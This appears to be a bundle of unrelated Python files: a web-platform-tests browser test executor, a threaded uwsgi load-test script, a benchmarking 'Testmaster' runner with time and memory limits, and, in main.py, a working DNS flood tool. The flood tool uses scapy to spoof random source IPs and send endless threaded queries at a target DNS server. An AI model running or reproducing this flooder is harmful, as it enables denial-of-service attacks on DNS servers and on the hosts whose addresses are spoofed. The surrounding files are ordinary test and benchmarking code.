executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
# By default the executor may try to cleanup windows after a test (to best
# associate any problems with the test causing them). If the user might
# want to view the results, however, the executor has to skip that cleanup.
if kwargs["pause_after_test"] or kwargs["pause_on_unexpected"]:
executor_kwargs["cleanup_after_test"] = False
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT",
3: "PRECONDITION_FAILED"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN",
4: "PRECONDITION_FAILED"}
def __call__(self, test, result, extra=None):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message, extra=extra, stack=stack)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def hash_screenshots(screenshots):
"""Computes the sha1 checksum of a list of base64-encoded screenshots."""
return [hashlib.sha1(base64.b64decode(screenshot)).hexdigest()
for screenshot in screenshots]
def _ensure_hash_in_reftest_screenshots(extra):
"""Make sure reftest_screenshots have hashes.
Marionette internal reftest runner does not produce hashes.
"""
log_data = extra.get("reftest_screenshots")
if not log_data:
return
for item in log_data:
if type(item) != dict:
# Skip relation strings.
continue
if "hash" not in item:
item["hash"] = hash_screenshots([item["screenshot"]])[0]
def get_pages(ranges_value, total_pages):
"""Get a set of page numbers to include in a print reftest.
:param ranges_value: Parsed page ranges as a list e.g. [[1,2], [4], [6,None]]
:param total_pages: Integer total number of pages in the paginated output.
:retval: Set containing integer page numbers to include in the comparison e.g.
for the example ranges value and 10 total pages this would be
{1,2,4,6,7,8,9,10}"""
if not ranges_value:
return set(range(1, total_pages + 1))
rv = set()
for range_limits in ranges_value:
if len(range_limits) == 1:
range_limits = [range_limits[0], range_limits[0]]
if range_limits[0] is None:
range_limits[0] = 1
if range_limits[1] is None:
range_limits[1] = total_pages
if range_limits[0] > total_pages:
continue
rv |= set(range(range_limits[0], range_limits[1] + 1))
return rv
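# For example, with the ranges value from the docstring and 10 total pages:
#   get_pages([[1, 2], [4], [6, None]], 10)  ->  {1, 2, 4, 6, 7, 8, 9, 10}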
def reftest_result_converter(self, test, result):
extra = result.get("extra", {})
_ensure_hash_in_reftest_screenshots(extra)
return (test.result_cls(
result["status"],
result["message"],
extra=extra,
stack=result.get("stack")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
def crashtest_result_converter(self, test, result):
return test.result_cls(**result), []
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TimedRunner(object):
def __init__(self, logger, func, protocol, url, timeout, extra_timeout):
self.func = func
self.logger = logger
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.extra_timeout = extra_timeout
self.result_flag = threading.Event()
def run(self):
if self.set_timeout() is Stop:
return Stop
if self.before_run() is Stop:
return Stop
executor = threading.Thread(target=self.run_func)
executor.start()
# Add twice the extra timeout since the called function is expected to
# wait at least self.timeout + self.extra_timeout and this gives some leeway
timeout = self.timeout + 2 * self.extra_timeout if self.timeout else None
finished = self.result_flag.wait(timeout)
if self.result is None:
if finished:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self.run_func fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "%s.run_func didn't set a result" %
self.__class__.__name__)
else:
if self.protocol.is_alive():
message = "Executor hit external timeout (this may indicate a hang)\n"
# get a traceback for the current stack of the executor thread
message += "".join(traceback.format_stack(sys._current_frames()[executor.ident]))
self.result = False, ("EXTERNAL-TIMEOUT", message)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
elif self.result[1] is None:
# We didn't get any data back from the test, so check if the
# browser is still responsive
if self.protocol.is_alive():
self.result = False, ("INTERNAL-ERROR", None)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
return self.result
def set_timeout(self):
raise NotImplementedError
def before_run(self):
pass
def run_func(self):
raise NotImplementedError
class TestExecutor(object):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
__metaclass__ = ABCMeta
test_type = None
convert_result = None
supports_testdriver = False
supports_jsshell = False
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def __init__(self, logger, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
self.logger = logger
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def reset(self):
"""Re-initialize internal state to facilitate repeated test execution
as implemented by the `--rerun` command-line argument."""
pass
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
try:
result = self.do_test(test)
except Exception as e:
exception_string = traceback.format_exc()
self.logger.warning(exception_string)
result = self.result_from_exception(test, e, exception_string)
if result is Stop:
return result
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol, subdomain=False):
scheme = "https" if protocol == "h2" else protocol
host = self.server_config["browser_host"]
if subdomain:
# The only supported subdomain filename flag is "www".
host = "{subdomain}.{host}".format(subdomain="www", host=host)
return "{scheme}://{host}:{port}".format(scheme=scheme, host=host,
port=self.server_config["ports"][protocol][0])
def test_url(self, test):
return urljoin(self.server_url(test.environment["protocol"],
test.subdomain), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e, exception_string):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "INTERNAL-ERROR"
message = text_type(getattr(e, "message", ""))
if message:
message += "\n"
message += exception_string
return test.result_cls(status, message), []
def wait(self):
self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
is_print = False
def __init__(self, logger, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, logger, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class CrashtestExecutor(TestExecutor):
convert_result = crashtest_result_converter
class PrintRefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
is_print = True
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi, page_ranges):
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.get_screenshot_list(test, viewport_size, dpi, page_ranges)
if not success:
return False, data
screenshots = data
hash_values = hash_screenshots(data)
self.screenshot_cache[key] = (hash_values, screenshots)
rv = (hash_values, screenshots)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def reset(self):
self.screenshot_cache.clear()
def check_pass(self, hashes, screenshots, urls, relation, fuzzy):
"""Check if a test passes, and return a tuple of (pass, page_idx),
where page_idx is the zero-based index of the first page on which a
difference occurs if any, or None if there are no differences"""
assert relation in ("==", "!=")
lhs_hashes, rhs_hashes = hashes
lhs_screenshots, rhs_screenshots = screenshots
if len(lhs_hashes) != len(rhs_hashes):
self.logger.info("Got different number of pages")
return False
assert len(lhs_screenshots) == len(lhs_hashes) == len(rhs_screenshots) == len(rhs_hashes)
for (page_idx, (lhs_hash,
rhs_hash,
lhs_screenshot,
rhs_screenshot)) in enumerate(zip(lhs_hashes,
rhs_hashes,
lhs_screenshots,
rhs_screenshots)):
comparison_screenshots = (lhs_screenshot, rhs_screenshot)
if not fuzzy or fuzzy == ((0, 0), (0, 0)):
equal = lhs_hash == rhs_hash
# sometimes images can have different hashes, but pixels can be identical.
if not equal:
self.logger.info("Image hashes didn't match%s, checking pixel differences" %
("" if len(hashes) == 1 else " on page %i" % (page_idx + 1)))
max_per_channel, pixels_different = self.get_differences(comparison_screenshots,
urls)
equal = pixels_different == 0 and max_per_channel == 0
else:
max_per_channel, pixels_different = self.get_differences(comparison_screenshots,
urls,
page_idx if len(hashes) > 1 else None)
allowed_per_channel, allowed_different = fuzzy
self.logger.info("Allowed %s pixels different, maximum difference per channel %s" %
("-".join(str(item) for item in allowed_different),
"-".join(str(item) for item in allowed_per_channel)))
equal = ((pixels_different == 0 and allowed_different[0] == 0) or
(max_per_channel == 0 and allowed_per_channel[0] == 0) or
(allowed_per_channel[0] <= max_per_channel <= allowed_per_channel[1] and
allowed_different[0] <= pixels_different <= allowed_different[1]))
if not equal:
return (False if relation == "==" else True, page_idx)
# All screenshots were equal within the fuzziness
return (True if relation == "==" else False, None)
def get_differences(self, screenshots, urls, page_idx=None):
from PIL import Image, ImageChops, ImageStat
lhs = Image.open(io.BytesIO(base64.b64decode(screenshots[0]))).convert("RGB")
rhs = Image.open(io.BytesIO(base64.b64decode(screenshots[1]))).convert("RGB")
self.check_if_solid_color(lhs, urls[0])
self.check_if_solid_color(rhs, urls[1])
diff = ImageChops.difference(lhs, rhs)
minimal_diff = diff.crop(diff.getbbox())
mask = minimal_diff.convert("L", dither=None)
stat = ImageStat.Stat(minimal_diff, mask)
per_channel = max(item[1] for item in stat.extrema)
count = stat.count[0]
self.logger.info("Found %s pixels different, maximum difference per channel %s%s" %
(count,
per_channel,
"" if page_idx is None else " on page %i" % (page_idx + 1)))
return per_channel, count
def check_if_solid_color(self, image, url):
extrema = image.getextrema()
if all(min == max for min, max in extrema):
color = ''.join('%02X' % value for value, _ in extrema)
self.message.append("Screenshot is solid color 0x%s for %s\n" % (color, url))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
page_ranges = test.page_ranges
self.message = []
# Depth-first search of reference tree, with the goal
# of reaching a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
page_idx = None
while stack:
hashes = [None, None]
screenshots = [None, None]
urls = [None, None]
nodes, relation = stack.pop()
fuzzy = self.get_fuzzy(test, nodes, relation)
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi, page_ranges)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
urls[i] = node.url
is_pass, page_idx = self.check_pass(hashes, screenshots, urls, relation, fuzzy)
if is_pass:
fuzzy = self.get_fuzzy(test, nodes, relation)
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1])
for item in reversed(nodes[1].references)))
else:
# We passed
return {"status": "PASS", "message": None}
# We failed, so construct a failure message
if page_idx is None:
# default to outputting the last page
page_idx = -1
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi, page_ranges)
if success:
screenshots[i] = screenshot
log_data = [
{"url": nodes[0].url,
"screenshot": screenshots[0][page_idx],
"hash": hashes[0][page_idx]},
relation,
{"url": nodes[1].url,
"screenshot": screenshots[1][page_idx],
"hash": hashes[1][page_idx]},
]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def get_fuzzy(self, root_test, test_nodes, relation):
full_key = tuple([item.url for item in test_nodes] + [relation])
ref_only_key = test_nodes[1].url
fuzzy_override = root_test.fuzzy_override
fuzzy = test_nodes[0].fuzzy
sources = [fuzzy_override, fuzzy]
keys = [full_key, ref_only_key, None]
value = None
for source in sources:
for key in keys:
if key in source:
value = source[key]
break
if value:
break
return value
def retake_screenshot(self, node, viewport_size, dpi, page_ranges):
success, data = self.get_screenshot_list(node,
viewport_size,
dpi,
page_ranges)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
def get_screenshot_list(self, node, viewport_size, dpi, page_ranges):
success, data = self.executor.screenshot(node, viewport_size, dpi, page_ranges)
if success and not isinstance(data, list):
return success, [data]
return success, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None
def __init__(self, logger, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, logger, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.protocol = self.protocol_cls(self, browser)
def is_alive(self):
return self.protocol.is_alive()
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + self.extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message")
if message:
message += "\n"
message += traceback.format_exc()
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def load(self, url):
pass
def execute_script(self, script, asynchronous=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
pass
def set_window(self, handle):
pass
def window_handles(self):
return []
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WdspecProtocol(Protocol):
server_cls = None
implements = [ConnectionlessBaseProtocolPart]
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args)
self.server.start(block=False)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive():
self.server.stop()
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that are more different to WebDriver may need to create a
fully custom implementation."""
unimplemented_exc = (NotImplementedError,)
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {cls.name: cls(self.logger, self.protocol) for cls in actions}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [strip_server(url)] + payload
return True, rv
def process_action(self, url, payload):
action = payload["action"]
cmd_id = payload["id"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
with ActionContext(self.logger, self.protocol, payload.get("context")):
result = action_handler(payload)
except self.unimplemented_exc:
self.logger.warning("Action %s not implemented" % action)
self._send_message(cmd_id, "complete", "error", "Action %s not implemented" % action)
except Exception:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message(cmd_id, "complete", "error")
raise
else:
self.logger.debug("Action %s completed with result %s" % (action, result))
return_message = {"result": result}
self._send_message(cmd_id, "complete", "success", json.dumps(return_message))
return False, None
def _send_message(self, cmd_id, message_type, status, message=None):
self.protocol.testdriver.send_message(cmd_id, message_type, status, message=message)
class ActionContext(object):
def __init__(self, logger, protocol, context):
self.logger = logger
self.protocol = protocol
self.context = context
self.initial_window = None
def __enter__(self):
if self.context is None:
return
self.initial_window = self.protocol.base.current_window
self.logger.debug("Switching to window %s" % self.context)
self.protocol.testdriver.switch_to_window(self.context)
def __exit__(self, *args):
if self.context is None:
return
self.logger.debug("Switching back to initial window")
self.protocol.base.set_window(self.initial_window)
self.protocol.testdriver._switch_to_frame(None)
self.initial_window = None
|
main.py
|
#!./env/bin/python3
from scapy.all import *
from time import sleep
from sys import exit as sysexit
import string
import random
import threading
from argparse import ArgumentParser
# check for root
if not os.geteuid() == 0:
sysexit("\nOnly root can run this script\n")
# init option parser
parser = ArgumentParser(description='Simple DNS-Flooder')
parser.add_argument("-s", "--server", help='DNS-Server IP Address', required=True)
parser.add_argument("-t", "--threads", type=int, help='Threads to use', required=True)
args = parser.parse_args()
# perform dns query
def perform_query(dns, domain, sourceIP):
packet = IP(src=sourceIP, dst=dns) / UDP() / DNS(rd=1, qd=DNSQR(qname=domain))
send(packet)
# randomized Domain
def get_rand_domain():
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(6))
# randomized IP
def get_random_IP():
genIP = ""
for i in range(0, 4):
part = str(random.randint(1,254))
genIP += part + "."
return genIP[:-1]
# flood
def flood():
while True:
global answ
domainToUse = get_rand_domain()
ipToUse = get_random_IP()
try:
answ = perform_query(args.server, f"{domainToUse}.com", ipToUse)
except:
domainToUse = get_rand_domain()
# start threads
def start_threads():
threads = int(args.threads)
for i in range(1,threads):
t = threading.Thread(target=flood)
t.start()
# start here
if __name__ == "__main__":
print(f"Starting Flood of {args.server} with {args.threads} Threads in 3 seconds ...")
sleep(3)
start_threads()
|
request.py
|
# Uses 20 threads to generate requests and force uwsgi
# queuing to happen
import requests
import threading
def request_loop():
while True:
requests.get('http://uwsgi-test:8080/')
if __name__ == "__main__":
threads = []
for i in range(20):
t = threading.Thread(target=request_loop)
threads.append(t)
t.start()
for t in threads:
t.join()
|
testmaster.py
|
# Authors: Dennis Benz, Levin Nemesch, Jo Sandor
# Version 1, 2022
import multiprocessing as mp
import resource
import subprocess as sp
import json
import sys, getopt
from time import time, sleep
import threading as thr
from queue import Queue
# Font utility class for formatted output
class font:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
# If this is true, a bunch of debug print statements are printed
DEBUG = True
def process_input(json_filename):
"""
Utility function that parses the input from a json file to a dictionary
@param json_filename Name of the input file
@return A dictionary that is parsed from the json file
"""
data = 1
try:
with open(json_filename) as json_file:
data = json.load(json_file)
return data
except FileNotFoundError:
print("Input file does not exist.")
print_usage()
sys.exit(2)
def get_input_file(argv):
"""
Processes the arguments given to the program.
@param argv Must be system arguments
@return The name of the input file
"""
input_file = ''
try:
opts, args = getopt.getopt(argv,"hi:o:d",["ifile=","ofile="])
except getopt.GetoptError:
print_usage()
sys.exit(2)
if len(sys.argv) == 1:
print_usage()
sys.exit()
for opt, arg in opts:
if opt == '-h' or opt == "-help":
print_usage()
sys.exit()
elif opt in ("-i", "--ifile"):
input_file = arg
elif opt == "-d":
global DEBUG
DEBUG = False
return input_file
def print_usage(complete=True):
"""
Prints a welcome and usage message when the Testmaster is invoked with incorrect or missing arguments.
"""
if complete:
print(font.BOLD + font.CYAN + "Welcome to Testmaster" + font.END + font.END)
print("Provide an input file in the following way:")
print("testmaster.py", font.BOLD + "-i" + font.END, "[input_file_name].json",)
print("To disable the output set flag -d.")
print("The required format of the json-file is specified here:")
print(font.BLUE + "https://gitpgtcs.informatik.uni-osnabrueck.de/spanners/experiments/-/tree/testmaster" + font.END)
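# Illustrative input file (all values are placeholders; the key names are exactly those
# read from the parsed json in the __main__ block below):
#
# {
#     "time_limit": 60000,
#     "memory_limit": 2000,
#     "number_processes": 4,
#     "commands": ["./spanner --input graph1.txt", "./spanner --input graph2.txt"],
#     "output_filename": "results.json"
# }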
def check_json_keys(json_dict):
"""
Checks if all required keys are set
:param json_dict: dict parsed from json
:return: True if required key are set
"""
required_keys = ["command", "runtime", "weight", "actual_stretch", "graph_information"]
required_graph_information = ["nodes", "edges", "directed", "weighted", "simple"]
for key in required_keys:
if key not in json_dict:
return False
for key in required_graph_information:
if key not in json_dict["graph_information"]:
return False
return True
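# Illustrative command output that would pass check_json_keys (all values are
# placeholders; the key names come from required_keys / required_graph_information):
#
# {
#     "command": "./spanner --input graph1.txt",
#     "runtime": 12.3,
#     "weight": 42.0,
#     "actual_stretch": 1.5,
#     "graph_information": {"nodes": 100, "edges": 250, "directed": false,
#                           "weighted": true, "simple": true}
# }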
def parse_command_data(cmd, data):
"""
Parses the stdout and stderr data of a command
:param cmd: Command related to the data
:param data: (stdout_data, stderr_data)
:type data: tuple
:return: output json string
"""
output, error = data
error_dict = {"command": cmd}
# error in subprocess
if error:
# C++ should throw a "Memory Limit Exceeded" error and Python "MemoryError" if memory limit is exceeded
if "Memory" in error:
error_dict["error"] = "Memory limit exceeded."
else:
error_dict["error"] = error
return json.dumps(error_dict)
# parse json output
try:
parsed_output = json.loads(output)
# add command if not included
if "command" not in parsed_output:
parsed_output["command"] = cmd
if check_json_keys(parsed_output):
return json.dumps(parsed_output)
else:
error_dict["error"] = "Please provide all required keys in the json output."
error_dict["output"] = output
return json.dumps(error_dict)
except json.JSONDecodeError:
error_dict["error"] = "The command output can't be parsed. Ensure that the output is formatted in json."
error_dict["output"] = output
return json.dumps(error_dict)
def create_output_str(json_output, i):
"""
Creates an output string that allows for the json output strings to be parsed into a big output file
@param json_output string of one single json output of a process
@param i index of the process
"""
return ',\n' + '"Test' + str(i) + '" : ' + json_output
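# For example, create_output_str('{"command": "..."}', 3) yields the fragment
#   ,\n"Test3" : {"command": "..."}
# which is appended to the output file that the __main__ block opens with
# '{"initialized" : true' and closes with '}'.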
def work(queue, lock, time_limit, memory_limit, output_queue):
"""
Worker function which starts a subprocess and handles time and memory limit.
Puts the result strings on the output queue for the writer thread.
@param queue The queue to pop new jobs from
@param lock A lock guarding access to the job queue
@param time_limit A global time limit for all jobs in ms
@param memory_limit A global memory limit for all jobs in MB
@param output_queue The queue the finished jobs' output strings are put on
"""
# calculate the memory limit. It is passed as MB so it needs to be calculated to byte first
def set_mem_limit():
ml = memory_limit * 1000000
resource.setrlimit(resource.RLIMIT_AS, (ml, resource.RLIM_INFINITY))
while True:
lock.acquire()
if queue.empty():
lock.release()
break
task_index, cmd = queue.get()
lock.release()
try:
commands = cmd.split()
proc = sp.Popen(commands, shell=False, stdout=sp.PIPE, stderr=sp.PIPE, text=True, preexec_fn=set_mem_limit)
try:
# preexec_fn=set_mem_limit (passed to Popen above) limits the memory available to this job
proc.wait(timeout=time_limit/1000) # ms to second
# parse command data
json_output = parse_command_data(cmd, proc.communicate())
if DEBUG:
print("Test", task_index, "finished.", cmd)
output_queue.put(create_output_str(json_output, task_index))
except sp.TimeoutExpired as e:
json_output = json.dumps({"command": cmd, "error": "Time limit exceeded."})
if DEBUG:
print("Test", task_index, "didn't finish.", "Timeout expired.", cmd)
output_queue.put(create_output_str(json_output, task_index))
finally:
proc.kill()
except Exception as e:
json_output = json.dumps({"command": cmd, "error": str(e)})
if DEBUG:
print("Test", task_index, "didn't finish.", "Error occurred.", cmd)
output_queue.put(create_output_str(json_output, task_index))
class OutputThread(thr.Thread):
"""
A daemon thread that writes the results of finished processes to the output file in a thread-safe way while the Testmaster is running
@param output_queue A queue where the output strings are stored
@param output_file The target output file where the thread is supposed to write to
"""
def __init__(self, output_queue, output_file):
super().__init__(daemon=True)
self.output_queue = output_queue
self.output_file = output_file
self._thread_stopped = thr.Event()
def stop(self):
self._thread_stopped.set()
def stopped(self):
return self._thread_stopped.is_set()
def run(self):
while True:
if not self.output_queue.empty():
with open(self.output_file, 'a') as f:
f.write(self.output_queue.get())
if self.stopped():
break
sleep(1)
# if DEBUG:
# print("daemon still running!")
if __name__ == "__main__":
# Get the input file specified and extract the parameters from the dictionary
input_file = get_input_file(sys.argv[1:])
input = process_input(input_file)
time_limit = input["time_limit"]
memory_limit = input["memory_limit"]
number_processes = input["number_processes"]
commands = input["commands"]
output_filename = input["output_filename"]
print(font.BOLD + font.CYAN + "Welcome to Testmaster" + font.END + font.END)
print("Running some tests now. output =", DEBUG, "\n")
# Check if the input file is ok
if not all(isinstance(i, int) for i in [time_limit, memory_limit, number_processes]):
print("Error in input file: time_limit, memory_limit and number_processes must be integers.")
print_usage(False)
exit(1)
if not type(commands) == list:
print("Error in input file: commands must be a list of shell commands")
print_usage(False)
exit(1)
if not type(output_filename) == str:
print("Error in input file: output_filename must be a string containing a valid file path")
print_usage(False)
exit(1)
if DEBUG:
print(font.BOLD + 'Input file:' + font.END, input_file)
print(font.BOLD + "Metadata:" + font.END,
str(time_limit)+"ms,",
str(memory_limit)+"MB,",
str(number_processes)+" processes,",
)
print(font.BOLD + "Commands:" + font.END,)
for i, c in enumerate(commands):
print(str(i) + ".", font.GREEN + c + font.END)
print(font.BOLD + "Write to:" + font.END, output_filename)
# Calculate the max number of CPUs that can be used. Use n-1 to ensure normal computer activities are still running
n_cpus = mp.cpu_count() - 1
if DEBUG:
if number_processes > n_cpus:
print(font.BOLD + font.RED + "Info:" + font.END + font.END, "Less CPUs are available than specified.")
print(font.BOLD + "Max Number of CPUs:" + font.END, n_cpus)
# If fewer processes are wanted, cap the number of used CPUs here
if number_processes < n_cpus:
n_cpus = number_processes
if DEBUG:
print(font.BOLD + "Used CPUs:" + font.END, n_cpus,"\n")
# Output queue for the finished processes output. Will write to file no matter what happens in the processes
output_queue = Queue()
# Add an initial value to the file in order to ensure correct JSON file output
f = open(output_filename, 'w')
f.write('{"initialized" : true')
f.close()
# Measure the time the processes take because why not, also nice for debugging!
t1 = time()
# Start a daemon thread that is able to write to file while the processes are still running
output_thread = OutputThread(output_queue, output_filename)
output_thread.start()
# To execute in parallel a queue is provided.
# From the queue the processes are started as soon as there's space.
# The number of processes is limited by the user.
try:
proc_queue = mp.Queue(maxsize=len(commands))
# Add an index to each command to keep track of the command ids
for i, cmd in enumerate(commands):
proc_queue.put((i, cmd))
active_processes = []
lock = mp.Lock()
for proc in range(n_cpus):
active_processes.append(thr.Thread(target=work, args=(proc_queue, lock, time_limit, memory_limit, output_queue)))
active_processes[proc].start()
# Wait for the processes/threads to finish
for proc in active_processes:
proc.join()
except KeyboardInterrupt:
print("Tests manually aborted. Some tests might not be finished.")
except:
print(font.RED + "An unexpected error occurred." + font.END)
print("Sorry about that. The finished processes should be written to the specified output file anyway ... if not please contact the developer(s).")
finally:
# Stop file output thread
output_thread.stop()
output_thread.join()
# Write the rest of the output queue to the file.
# Even if something went wrong in the program, the queue's remaining content is written out here.
f = open(output_filename, 'a')
while not output_queue.empty():
f.write(output_queue.get())
f.write("}")
f.close()
# Calculate the time the program used to do all the processes.
# Has no specific use except a nice output at the end of the Testmaster
t2 = time()
count_time = int(t2-t1)
if count_time < 60:
print(font.CYAN + font.BOLD + "\nTestmaster worked for approx.", count_time, "seconds." + font.END + font.END)
else:
count_time = round(count_time / 60, 2)
print(font.CYAN + font.BOLD + "\nTestmaster worked for approx.", count_time, "minutes." + font.END + font.END)
print(font.CYAN + "Finished writing to file!" + font.END)
print("The output can be found in", font.BOLD + output_filename + font.END)
|
datasets.py
|
#
